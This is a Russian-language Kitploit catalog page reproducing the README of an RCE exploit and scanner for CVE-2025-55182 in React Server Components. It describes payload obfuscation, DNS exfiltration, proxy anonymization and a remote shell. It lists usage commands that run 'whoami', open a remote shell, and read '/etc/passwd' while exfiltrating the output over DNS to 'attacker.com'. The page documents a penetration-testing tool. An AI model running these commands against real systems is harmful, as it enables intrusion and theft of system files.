Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit — Продвинутый сканер RCE для React Server Components, предназначенный для CVE-2025-55182. Возможности: многоэтапное фингерпринтинг, проверка уязвимости, DNS-эксфильтрация, интерактивная оболочка, обфускация полезной нагрузки и профессиональная отчётность (JSON/HTML/PDF). Только авторизованное тестирование. | Kitploit
Инструменты/GitHubGitHub/cerberusmrxi/cve-2025-55182-advanced-react-server-components-rce-exploit
РазведкаСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхОбход WAFТестирование на ПроникновениеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
GitHubcerberusmrxi/cve-2025-55182-advanced-react-server-components-rce-exploit

CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit

Репозиторий
1342 месяцев назадЕщё не проверено

Описание

Продвинутый сканер RCE для React Server Components, предназначенный для CVE-2025-55182. Возможности: многоэтапное фингерпринтинг, проверка уязвимости, DNS-эксфильтрация, интерактивная оболочка, обфускация полезной нагрузки и профессиональная отчётность (JSON/HTML/PDF). Только авторизованное тестирование.

Поделиться

🔐 ReactRCE-Scanner

CVE-2025-55182 — Продвинутый фреймворк для эксплуатации и оценки RCE в React Server Components

Version CVE CVSS Python License

Author PRs Welcome Downloads


📑 Содержание

  • Правовая оговорка и этическое уведомление

  • Обзор

  • Ключевые возможности

  • Краткое руководство по началу работы

  • Архитектура и подробный обзор возможностей

  • Справочник по конфигурации

  • Автоматизированный набор тестов

  • Устранение и смягчение последствий

  • Участие и сообщество

  • Ссылки

  • Лицензия и автор


⚠️ Правовая оговорка и этическое уведомление

Этот инструмент разработан исключительно в ОБРАЗОВАТЕЛЬНЫХ целях и для АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ. Неавторизованное использование данного программного обеспечения против целей без предварительного письменного согласия является нарушением международных законов о компьютерных преступлениях, включая Computer Fraud and Abuse Act (CFAA), требования GDPR и стандартные условия соглашений об оказании услуг. Автор и участники проекта снимают с себя всякую ответственность за любое неправомерное использование, незаконные операции или косвенный ущерб, возникший в результате работы этой программы. Действуйте строго на свой страх и риск.


📋 Обзор

ReactRCE-Scanner — это фреймворк корпоративного уровня для оценки и проверки безопасности, разработанный специально для CVE-2025-55182 [1] — критической уязвимости удалённого выполнения кода (RCE), затрагивающей React Server Components в версиях от 19.0.0 до 19.2.0.

Фреймворк устраняет разрыв между теоретическими исследованиями уязвимостей и практической проверкой безопасности. Благодаря многоэтапному фингерпринтингу, строгому снижению числа ложных срабатываний, продвинутой обфускации полезной нагрузки и автоматизированной отчётности в нескольких форматах, он предоставляет инженерам по безопасности точные диагностические возможности.

ИспользованиеРезультаты сканирования

🎯 Ключевые возможности

Категория возможностиКлючевая реализацияСтатус
Умный фингерпринтингМногоисточниковое определение фреймворка и версии с алгоритмами оценки достоверности.✅
Многоэтапная проверка5-этапный конвейер валидации, предназначенный для систематического исключения ложных срабатываний.✅
Генерация полезной нагрузкиКонструктор обфусцированных полезных нагрузок с поддержкой DNS-эксфильтрации и множественных кодировок.✅
Интерактивная оболочкаПсевдоинтерактивное выполнение команд в реальном времени и доступ к оболочке на подтверждённых целях.✅
Комплексная отчётностьАвтоматическая генерация отчётов в форматах JSON, HTML, PDF и Markdown.✅
DNS-эксфильтрацияВнеполосная эксфильтрация вывода команд через безопасную обработку DNS-запросов.✅
Движок параллелизмаВысокопроизводительная многопоточная архитектура сканирования для больших поверхностей атаки.✅
Интеграция с проксиПоддержка HTTP/HTTPS и SOCKS прокси для анонимизации трафика оценки.✅

🚀 Краткое руководство по началу работы

Установка

Клонируйте репозиторий и инициализируйте окружение с помощью автоматизированного скрипта установки или ручной установки зависимостей:

# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit

# Configure execution permissions and run setup script
chmod +x setup.sh
./setup.sh

# Alternatively, install core Python dependencies manually
pip install -r requirements.txt

Справочник основных команд

Фреймворк работает через модульную CLI-архитектуру, поддерживающую проверку одной цели, массовое сканирование из списков файлов, запуск интерактивной оболочки и формирование отчётов о соответствии.

# 1. Perform a vulnerability scan against a single target
python exploit.py -t https://target.com -m scan

# 2. Execute bulk scans from a target list with JSON export
python exploit.py -f targets.txt -m scan -o report.json

# 3. Execute a single command on a verified vulnerable endpoint
python exploit.py -t https://target.com -m exploit -c "whoami"

# 4. Initiate an interactive remote shell session
python exploit.py -t https://target.com -m shell

# 5. Execute commands with out-of-band DNS exfiltration
python exploit.py -t https://target.com -m exploit -c "cat /etc/passwd" -d attacker.com

# 6. Compile a professional executive assessment report in PDF format
python exploit.py -f targets.txt -o assessment_report.pdf --format pdf

🔬 Архитектура и подробный обзор возможностей

1. Движок умного фингерпринтинга

Фреймворк выполняет глубокую разведку перед доставкой полезной нагрузки. Он анализирует множество полей HTTP-заголовков (X-Powered-By, Next-Action, RSC), структурные мета-теги HTML (data-reactroot, __NEXT_DATA__), статические ресурсы сборки и исходные JavaScript-бандлы [2] [3].

Оценки достоверности разделены на четыре уровня:

  • CRITICAL (95%+): Несколько независимых индикаторов подтверждают уязвимые версии среды выполнения React Server Component.

  • HIGH (75–95%): Обнаружены сильные структурные индикаторы с точным совпадением версии.

  • MEDIUM (50–75%): Присутствуют частичные маркеры фреймворка; требуется ручная проверка.

  • LOW (<50%): Обнаружены слабые эвристики; высокая вероятность ложного срабатывания.

2. Рабочий процесс многоэтапной проверки

Скачать инструмент